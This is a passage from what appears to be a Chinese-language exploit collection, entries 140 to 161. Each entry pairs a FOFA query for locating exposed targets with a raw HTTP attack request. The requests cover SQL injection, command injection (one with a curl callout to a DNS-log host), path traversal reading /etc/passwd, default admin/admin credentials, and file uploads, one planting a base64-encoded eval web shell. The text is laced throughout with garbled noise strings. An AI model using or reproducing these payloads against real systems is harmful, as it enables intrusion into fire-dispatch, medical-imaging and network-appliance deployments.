User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 u+ d' }0 J9 s+ MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( [7 c9 b, o1 e2 D( Y: d* X: p4 M3 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# x' M1 M6 r" ?( O' IAccept-Encoding: gzip, deflate, br
: U( H/ }- g! w' d' {( W5 ]& E kConnection: close
, M% U8 K5 T$ x! X9 W5 c$ qCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk* ?0 I9 ?( q# k* U
Upgrade-Insecure-Requests: 1
# v7 w* b' W6 E; r7 D5 _$ l) [- @- M
( f% I" g8 @2 B+ C0 ?% b, z
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' M0 W5 x# D) J0 J
CVE-2024-2566: z3 e$ G1 x4 _5 r7 Q
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" E! Q* F |+ OGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
A7 P( ~4 S3 E4 Y \7 D2 {# ?2 BHost: x.x.x.x1 q! H0 P* c! {3 E1 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 D6 x7 p5 y L4 M4 Q4 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ O- z5 X: X& c' `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 ?9 r" e! g/ S+ i
Accept-Encoding: gzip, deflate, br
8 Z, ^* i4 [2 `6 g3 n- m9 O* aConnection: close( C) F3 u( d1 ~
Cookie: authcode=h8g9
# X5 [' ?; r6 t4 t$ d* P# TUpgrade-Insecure-Requests: 1
# f$ H9 a2 ]) X3 B
8 ]9 @5 l& s& J9 j5 H- t3 A7 X2 C9 E$ N! g9 ?6 J; i
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
) L) k' B) ~ U$ |% X! h4 wFOFA:body="指挥调度管理平台"
8 D* T: y+ a0 f- b. @5 YPOST /app/ext/ajax_users.php HTTP/1.1
* i. v! f4 Z) Y/ k) V) h0 i$ dHost: your-ip7 {' Y$ J7 P v
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
- D+ Y% o& |+ Q2 D8 B, M& s) [$ |# _Content-Type: application/x-www-form-urlencoded
4 ^, U, `: \' z" s5 E- n( p) |4 P, K
3 `3 H5 _- ~ L- E# C3 N9 ~: }8 A
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
7 o6 e; q+ Y, ^
! V4 L) `% `. a( n- c8 Q' G8 V" ^1 A$ v; ?: ?5 H% G5 Y w
142. CMSV6车辆监控平台系统中存在弱密码/ m* }* m3 j. q
CVE-2024-29666 u( r) k! i8 [( L
FOFA:body="/808gps/"" d6 o: ` V# J0 P, b" y/ K( B5 Q
admin/admin
# J0 q7 f% E2 W. k9 C+ \143. Netis WF2780 v2.1.40144 远程命令执行4 l( b4 S& T0 \' c6 _
CVE-2024-25850
$ c# i3 p3 N2 e" X/ oFOFA:title='AP setup' && header='netis'8 ^. l% |" K9 s- @2 n
PAYLOAD8 H; ?# }- S6 m; x0 d# z2 R
# b' G5 X& S+ Y; x4 m: U144. D-Link nas_sharing.cgi 命令注入1 n. G+ u+ R! o3 [( n | \
FOFA:app="D_Link-DNS-ShareCenter"
* z) @, G* l8 z$ I. V4 a I1 G8 Ysystem参数用于传要执行的命令
: | [, M3 v Z+ wGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.15 L* n+ {' k2 }( O
Host: x.x.x.x
6 B$ }$ x# Y" Y6 X& ?! o k8 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
: Z8 H- V `" l7 t0 |' CConnection: close
8 N, _# e, N% t& U% [Accept: */*$ C+ w# H9 U* h# X3 ?3 F/ a9 e
Accept-Language: en
, n! F, b+ t# VAccept-Encoding: gzip: P: C% U2 ?; ^: Q$ s# [
$ ~% s! c+ z5 {
3 t7 W+ S" X. X4 W, Z5 z5 K6 n1 I% ~5 I
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
( v+ r% p' l) P1 BCVE-2024-3400
5 }5 g* e9 F1 G* S" ^) PFOFA:icon_hash="-631559155") V' X# ~% S: k1 ~! C
GET /global-protect/login.esp HTTP/1.1
+ j5 C9 n/ i, a2 OHost: 192.168.30.112:1005/ [# `4 j+ V: G! j& s5 w8 V1 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 u. h; V/ s5 o* X
Connection: close
5 L; o" Y% R5 s. BCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;6 b& g8 F$ ^8 P3 D
Accept-Encoding: gzip
; k$ S# f) ? t% }$ w, Z
; A' q$ C: R: Y# `8 g% ]$ F4 D/ K- Y3 L
146. MajorDoMo thumb.php 未授权远程代码执行
; M3 |! L5 x& T8 TCNVD-2024-021757 `. c _" l6 F- \( K
FOFA:app="MajordomoSL"
* R" J$ M4 h. x& y, s" wGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
" U0 I0 E( n3 \" r: IHost: x.x.x.x
) w/ s/ F* q+ i% WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 G7 i" M0 P4 A2 v2 TAccept-Charset: utf-8
* u6 p& K3 y1 B& L n/ [Accept-Encoding: gzip, deflate
3 J3 h) ?) J8 W7 M$ b. RConnection: close
& j0 E, i4 I6 v1 `) q/ K6 G! I+ u% ?' A1 r$ N
# t5 v0 B% p1 F" l147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
: k8 a. N) M7 Q# z* ^& A4 iCVE-2024-32399' ^ U* F' i) b8 P' g9 }
FOFA:body="RaidenMAILD"
) l0 h! x6 j5 S* O* [GET /webeditor/../../../windows/win.ini HTTP/1.14 ?4 j6 o, Q* r7 V4 _/ u
Host: 127.0.0.1:81
. _7 i- t; y: ]8 o+ m! DCache-Control: max-age=0
1 ]6 r7 h4 g4 N2 H# @1 U) dConnection: close& G5 n2 Z# B+ |" E* e+ l
h- t7 L8 S# e' C# n
6 J: y* s- ~0 P: ]0 @2 e8 X j; s148. CrushFTP 认证绕过模板注入
0 q7 Y0 J' J& Q# H& ECVE-2024-4040
- X: }: Y( t& E6 Q3 K$ HFOFA:body="CrushFTP"# L& {" ~# U5 h1 X4 q' D
PAYLOAD5 }" I0 @ q5 {* @& J
" a5 O3 b* w1 n2 d. n
149. AJ-Report开源数据大屏存在远程命令执行
5 d; k6 w2 n4 ^5 AFOFA:title="AJ-Report"
9 F! P B _" L% Z* g n" h5 H W+ ^* ~1 |; _
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
4 o/ n. ~4 [2 N2 l W; y( EHost: x.x.x.x
/ g! R9 _! |% q$ A, KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 e/ K( q9 ?- y7 M$ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 }* b) @) a) F$ X
Accept-Encoding: gzip, deflate, br
" N! `4 k1 @2 ^7 w' c) o* kAccept-Language: zh-CN,zh;q=0.99 ]" @8 C; b: }- v: @
Content-Type: application/json;charset=UTF-8
) E! j. o5 [ q, sConnection: close
7 R. }5 k0 A0 q. R6 k( a4 c) { D1 v! |& l7 b1 w
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}" M9 c# f$ m3 j: E
6 Z" p/ G! J3 H+ I( @: J" q150. AJ-Report 1.4.0 认证绕过与远程代码执行; `! l1 c4 c1 J, Q. f. x" n+ s* D
FOFA:title="AJ-Report"
/ u* Z8 J; s- F6 n3 f6 }POST /dataSetParam/verification;swagger-ui/ HTTP/1.16 G1 b, D( H! j$ G& u4 W
Host: x.x.x.x$ f8 F. @& Q; i* b* ]* j- Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 B( Y' m4 T1 A5 i8 R* Z3 q( [* P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 y; o8 f- n' @8 y. ^# g% K+ j7 i
Accept-Encoding: gzip, deflate, br
, D" b# v" H2 Y* `1 V: c' gAccept-Language: zh-CN,zh;q=0.9
9 r) O; Y# {: w! C' ^/ y- |8 }Content-Type: application/json;charset=UTF-8; L+ I F" I* v6 [
Connection: close
. a9 l; W2 X( l% ]2 o5 p2 FContent-Length: 339
( R% D* ], H4 I) V! c2 j. }
! X! m' V" c) m- }* t& T6 z* {{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}4 I% v* E, S7 Q3 o
9 w l: g& T6 u% O* N; O& m' t; h1 y* E. f+ r
151. AJ-Report 1.4.1 pageList sql注入
- q7 d- u# {% Y+ e' M6 [- uFOFA:title="AJ-Report"3 S0 E8 F% j- L& V
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1' A7 q& Z9 g: p8 T0 {
Host: x.x.x.x
7 { L' F6 q9 _0 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ c$ R z9 g" l h3 x$ V$ nConnection: close' O1 b) c% j5 T2 l
Accept-Encoding: gzip+ V: j6 `/ m# D0 u
4 }2 d( K$ |: M+ P3 q( F. X# ^( Y ^ t; f" X/ D, p: a
152. Progress Kemp LoadMaster 远程命令执行
! @% M1 ?; W! l/ x& K2 bCVE-2024-1212
1 v+ }2 S7 N5 M" a( _0 y' b0 QLoadMaster <= 7.2.59.2 (GA)6 e3 V' R% W+ G& b0 E: Z" B
LoadMaster<=7.2.54.8 (LTSF)& ]- E2 a. \+ B% h. y5 V
LoadMaster <= 7.2.48.10 (LTS); B5 B. r5 j* O K1 x: \3 n( G
FOFA:body="LoadMaster"6 @8 t; a6 r; w- v6 F6 y8 Z/ W
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( n) U/ e0 x% m# C1 p W. W
GET /access/set?param=enableapi&value=1 HTTP/1.1, L/ P% K4 G4 b5 V4 g: L( L6 w
Host: x.x.x.x# i; c: M0 u! x1 n5 a5 t) {) `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1: r5 T; x9 [ m. ` H4 n
Connection: close
: S& O# ]. s4 n2 ~Accept: */*
" \: u6 {: F) t/ p& ~$ VAccept-Language: en
! \& Z2 w8 O. P1 H, d! qAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
0 n% X$ ~/ _7 R: P9 i& h) n" ~Accept-Encoding: gzip
' c% t$ _" O$ O4 V( l
0 C) A' s6 d& Y6 X
1 d* w. c! y5 q o9 M# b153. gradio任意文件读取
- n5 t& Z% c, CCVE-2024-1561FOFA:body="__gradio_mode__"
5 ?; o! b; {. ^7 Y& q; H第一步,请求/config文件获取componets的id
/ ?9 i" P( ~, X/ t) w3 i- p$ s. |http://x.x.x.x/config# N2 z# g- i9 m: R# Y ?: ^
- ~* t1 j3 H0 K( {
' U5 I7 k/ n3 q% M" F第二步,将/etc/passwd的内容写入到一个临时文件2 I7 `. ?. n3 u
POST /component_server HTTP/1.1
: U$ H; [! y% x. u6 _Host: x.x.x.x
/ e7 {3 w5 V( r2 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
: |8 z0 R% d- D4 yConnection: close- e' A3 A9 B2 }2 e a
Content-Length: 1150 I {% h, m) q z r
Content-Type: application/json# K- a @6 A4 I/ b6 d k0 w2 [
Accept-Encoding: gzip' D! F% R2 S! Q5 [1 x2 T
1 Z7 R# D$ E1 z0 _0 H. f3 U+ d- V{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}+ A L2 n& O5 r$ b* \
! @8 Y9 G1 A N0 \2 `* j6 B& E- w" w( U! Z
第三步访问8 }" R1 J/ q, t. f) {
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
9 u8 F8 G* [& J. r3 B" x9 }3 g
, @! }2 D+ J3 d- |4 J& Q
154. 天维尔消防救援作战调度平台 SQL注入% }+ P7 d9 J2 z* T- T1 Q* s# Z
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"4 q! ]' n$ S" B9 K! I4 Q
POST /twms-service-mfs/mfsNotice/page HTTP/1.1; i; j! ^7 D. i
Host: x.x.x.x
" K5 \% E( J8 @6 ~5 N# A9 f, [+ uContent-Length: 106
6 r, i9 h- @% G1 f# D) _; L# tCache-Control: max-age=0
8 a# s' E& w1 tUpgrade-Insecure-Requests: 1# n: F( w% v8 n2 E. D/ N# q2 W
Origin: http://x.x.x.x
$ e. F' e' I4 A6 F1 o$ ?Content-Type: application/json
! C# X$ ~, k8 ^7 h4 @8 ?" W1 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
7 x- o" m% {( Z2 x8 [, q! wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' G* }9 A ]0 \. y
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page) r' ^9 |/ S! Y# [
Accept-Encoding: gzip, deflate
}$ S; r. s; MAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
1 @* b* P! N6 e& {9 v$ DConnection: close
. h. V6 y3 @6 Z+ I4 Z- q2 b" ~) G$ y/ W, u* I+ `: Z4 e& [
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}4 y, P0 t* t4 w: K% e& W/ x
; u/ h8 R+ _) I7 t0 e/ P6 q
& F! g M7 M9 X. Z2 Y( o$ F8 X5 i155. 六零导航页 file.php 任意文件上传0 _, ?( k! U9 z% k8 C& ]9 @9 I" p
CVE-2024-34982
" l+ s( Q2 K5 |1 [FOFA:title=="上网导航 - LyLme Spage"# P+ \6 [6 [% _2 O9 s
POST /include/file.php HTTP/1.1
. X3 G% w3 W" G" w6 r; ^; V: hHost: x.x.x.x6 D* N; [3 _2 r* ]) G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( ?" x: ~* ]3 H
Connection: close. @( u4 E$ K0 }; r0 E- A, _0 y
Content-Length: 232
- O3 c& V$ S# H6 ^4 {Accept: application/json, text/javascript, */*; q=0.019 O+ J: }2 [4 N* W) N2 S
Accept-Encoding: gzip, deflate, br
- b0 y1 j9 e) b2 F7 q+ H" yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' h' U) z* F5 F/ Y1 |$ Q0 I
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
0 Y; [- S6 P# l+ LX-Requested-With: XMLHttpRequest5 u- v8 F7 r* k, ] B' K% n
g" k8 d' o; ~3 W* z y-----------------------------qttl7vemrsold314zg0f
+ D+ Z4 }$ E" K: p4 l6 T6 e$ bContent-Disposition: form-data; name="file"; filename="test.php"
2 U( w% t; r* X8 n3 o- }Content-Type: image/png
& F3 D* b# M, {( O3 h2 n0 E
) V- e: }: M& `9 L1 @: e7 j' Y<?php phpinfo();unlink(__FILE__);?>
" n. a( m& i9 G5 {-----------------------------qttl7vemrsold314zg0f--. b: x4 ?, `6 F! S+ \" A
: n' [+ l8 D5 {! j+ l( V3 Q" G
$ h5 s3 N2 D% e+ {& D( {访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
% z2 J3 J( @) p1 e% F! U9 Z3 D+ C7 o
156. TBK DVR-4104/DVR-4216 操作系统命令注入
3 \# u7 J$ L3 C; g- ?, T) eCVE-2024-3721
, `7 c5 ]- t1 _6 A" g4 \FOFA:"Location: /login.rsp"4 M" }8 O7 K9 M3 D
·TBK DVR-4104
) a* _. Z" l9 t( f$ U·TBK DVR-4216
- _7 y* {+ @( t$ e2 Vcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& w' P9 s% y1 N+ k2 Z7 F( v' c; Q. X6 S( u4 P
2 v* I0 W) \" D- _- t
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
' ^, x% l% X! @& m3 d8 SHost: x.x.x.x
! S- z3 z" x8 ?6 U( n sUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 N. V% U7 l x) a) Y" i$ f6 ^1 yConnection: close7 j' W" z* p+ N1 p% e
Content-Length: 09 O$ D; ^# `8 I# a
Cookie: uid=1
" v( i5 Y4 J5 f. P( y2 R; ]( MAccept-Encoding: gzip
! P' Q8 k3 a' X: T6 @& }8 ^. x. y2 e' M
& y; E8 J8 Z. d: ?157. 美特CRM upload.jsp 任意文件上传
9 M" o" J2 P( MCNVD-2023-069714 [( d* Z4 E. q
FOFA:body="/common/scripts/basic.js"$ P I3 K% k: g. D3 F0 @9 b: s* `
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.13 [8 B6 s) z' C3 Z0 O. l
Host: x.x.x.x" t' @" L, m& f. s; \1 X7 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" X W/ l9 G5 G7 M6 a
Content-Length: 709
. U5 C- |9 b0 x7 }) v. H/ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' J2 W3 P: c) F+ W
Accept-Encoding: gzip, deflate9 K$ L" s4 ^% J5 a! N& c3 G0 U: K, g
Accept-Language: zh-CN,zh;q=0.9/ f0 i j$ M) J u, Z( l$ i
Cache-Control: max-age=08 u3 u4 f9 i8 p' v6 j! e, H
Connection: close
8 ]0 b8 N) [: m* E# t5 o5 v7 L( bContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
- Z1 R, Z8 z+ ~. f' J; fUpgrade-Insecure-Requests: 1# S: J+ @: e2 ?3 f) t+ f+ l
0 S: o/ |4 x! g- f; q, a# Q* N------WebKitFormBoundary1imovELzPsfzp5dN7 r$ F. m: ^' {3 H
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp", [$ y2 K0 z% ]( [8 ~
Content-Type: application/octet-stream, @6 b1 ^. H* J' J) q( Z
2 I, x0 x( n8 h5 N. ^
nyhelxrutzwhrsvsrafb$ y; N! V5 k l: D/ A( c8 S
------WebKitFormBoundary1imovELzPsfzp5dN( G1 m. D( J" A/ `, i" c7 e
Content-Disposition: form-data; name="key"; A9 g7 w+ e: N$ N; V
7 J% {- m4 ~, {/ {+ v/ k v
null
: _' N ~& E3 Q! o------WebKitFormBoundary1imovELzPsfzp5dN/ \/ F2 n# C6 r/ _! @1 g" i. V
Content-Disposition: form-data; name="form"
) G. N, j2 {6 B3 ]- P# w+ w5 T; E5 b; P/ r7 ?+ `/ r, b9 z. q
null7 y& J+ ^. B6 u4 ]% w+ {
------WebKitFormBoundary1imovELzPsfzp5dN
# _$ W6 w/ H) `/ h y" u7 e; HContent-Disposition: form-data; name="field"
, C8 u9 T+ O! U: M
( D4 o; F! Y" X c* |) nnull
- U- i) r5 t9 ^( x! M------WebKitFormBoundary1imovELzPsfzp5dN$ _+ q! s0 v: b$ p2 f o/ b) `( s
Content-Disposition: form-data; name="filetitile" b4 ?6 X( e$ @
/ h$ L4 j! c' n: Z
null/ I" N/ ]; O3 f
------WebKitFormBoundary1imovELzPsfzp5dN
2 o6 t4 p% T1 F$ F, X, N: uContent-Disposition: form-data; name="filefolder"
7 c, }. H2 r, M, C# o2 Z" d; m+ w# W' z, O
null% U8 Q* ~. Z' e8 I& Y5 N% U d
------WebKitFormBoundary1imovELzPsfzp5dN--
7 p5 y' J, b- g& Y
- S. a A1 p! \6 j: I3 x! r. J8 p
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp: } ]! }+ f/ T! N) D! D( @4 r
9 a" I, u3 m1 x2 G# R9 \0 G; D$ _
158. Mura-CMS-processAsyncObject存在SQL注入$ T6 G' Q+ H" q, Q* {7 q
CVE-2024-32640+ Q) \# }1 W+ j+ r7 a8 S# R
FOFA:"Generator: Masa CMS"
& U0 _: I) Z1 S) }2 ~: APOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1- W. S: _: n( k7 M0 o
Host: {{Hostname}}1 J& ]$ \8 _# e' w' ~8 h
Content-Type: application/x-www-form-urlencoded
3 W( l2 ?8 m! b% r g: r* |) w
( a" q- T- t( y# L+ H$ bobject=displayregion&contenthistid=x\'&previewid=1) W0 h/ v+ H z6 T$ [; v$ R
6 B3 `% p5 e4 M5 t& `5 {
) w# h% U5 D) l9 A9 \# V) e" J159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传1 f9 {3 x: m9 o; q$ y# @7 v1 s0 ~
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
0 P' ?8 j" Q7 c- I+ O9 ^7 I- n# [POST /webservices/WebJobUpload.asmx HTTP/1.11 r4 k6 V$ B' S+ |0 ~
Host: x.x.x.x
1 B2 F8 J' X( z/ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
M) ~5 A+ B' P5 u; J6 n6 W$ B: qContent-Length: 10805 p w8 F4 \0 B" {! c" e1 w
Accept-Encoding: gzip, deflate! D9 Z' k2 A0 X. o
Connection: close3 q- w) t2 _' _: b
Content-Type: text/xml; charset=utf-8+ T) N* ~" |5 }4 Z* z
Soapaction: "http://rainier/jobUpload"1 T7 R0 V! n; r5 g
" v% f$ y* u7 O# C/ R. A" ^1 A
<?xml version="1.0" encoding="utf-8"?>
' h9 J' }8 l! D2 ?, s* _<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
}1 H+ | x$ o! B, N<soap:Body>& f% s- C' D2 B' ?
<jobUpload xmlns="http://rainier">
{' M, z! y8 z9 G<vcode>1</vcode>
: u6 v2 i( z8 n" i; f8 B<subFolder></subFolder>2 c4 f$ M) h: A c! x9 s$ _
<fileName>abcrce.asmx</fileName>
k7 M- m) f$ S* \3 V8 G( I<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>+ p( `- T% b1 ^& p- V- R: d
</jobUpload>( l4 _ Z, d; B( d" n8 P8 T
</soap:Body>
% E, {7 K7 g$ e- X& D( e5 t8 y</soap:Envelope>
6 j2 p8 S: A8 m" w, j5 Y5 p, f3 A) t: }( H0 X1 U
( x8 p" r# s* T+ y/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
! l+ w1 O4 ^3 V" Y2 C0 D# n5 d# u: D8 t8 x& C$ d4 Y, y E
- Z7 H: Z4 t' e/ z1 y8 g0 f* j
160. Sonatype Nexus Repository 3目录遍历与文件读取
, c2 u1 V; @2 p0 yCVE-2024-4956
7 v4 k k5 C5 PFOFA:title="Nexus Repository Manager"
4 ?9 y* G+ \! {6 C' E4 cGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
* o( I g2 A9 |Host: x.x.x.x
( C! D% ~: L# J! ~; i4 D1 tUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.04 `) Q0 Q! J% M4 c( |7 \, S
Connection: close
( |5 Z9 |8 e# p% b H, fAccept: */*7 R' p) p: H$ l- N
Accept-Language: en6 f/ H& o, z+ n) q9 ?, t4 A
Accept-Encoding: gzip! J8 ^1 u: r. H! o7 K- |& B
: Q& }: G, D- ~8 I/ A* L- K
* {, x; W: Y U' Q/ J! r161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传/ L. f" N" G* O5 V) W% k
FOFA:body="/KT_Css/qd_defaul.css"
% b/ V- \8 c# L( H$ w, I. J第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
! N8 {1 G7 C" E% {/ B6 F1 vPOST /Webservice.asmx HTTP/1.1. @0 w- W2 s3 @+ ?6 a( L7 [
Host: x.x.x.x
" x7 Z8 C/ L2 m! ]( A8 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
2 L Q) a8 h1 ` d/ ZConnection: close0 g. N$ v8 p7 L: s# z& [% i
Content-Length: 4453 J7 c, E9 k. U
Content-Type: text/xml2 M: c5 q6 T; V) F" ^) H6 U
Accept-Encoding: gzip
+ }' a7 _# \5 P3 j8 q. g) h8 D
' m5 W$ V) v) r6 k5 }9 o# n& Q# K<?xml version="1.0" encoding="utf-8"?>3 }: z' k, Q5 o+ ^8 z
<soap:Envelope xmlns:xsi="
' k% t6 M' m: u/ j4 {3 i( ~& mhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
2 k. T: \0 J+ |" Qxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">2 ^; w* I0 t& r9 r: t
<soap:Body>9 Q$ ~3 X; [' d" b0 Q
<UploadResume xmlns="http://tempuri.org/">
5 f1 P4 S; y3 ~ ]6 J<ip>1</ip>. S, N5 i( V9 ]( i
<fileName>../../../../dizxdell.aspx</fileName>3 y* |& q; s; n6 }
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
- y' k$ N3 p8 F<tag>3</tag>
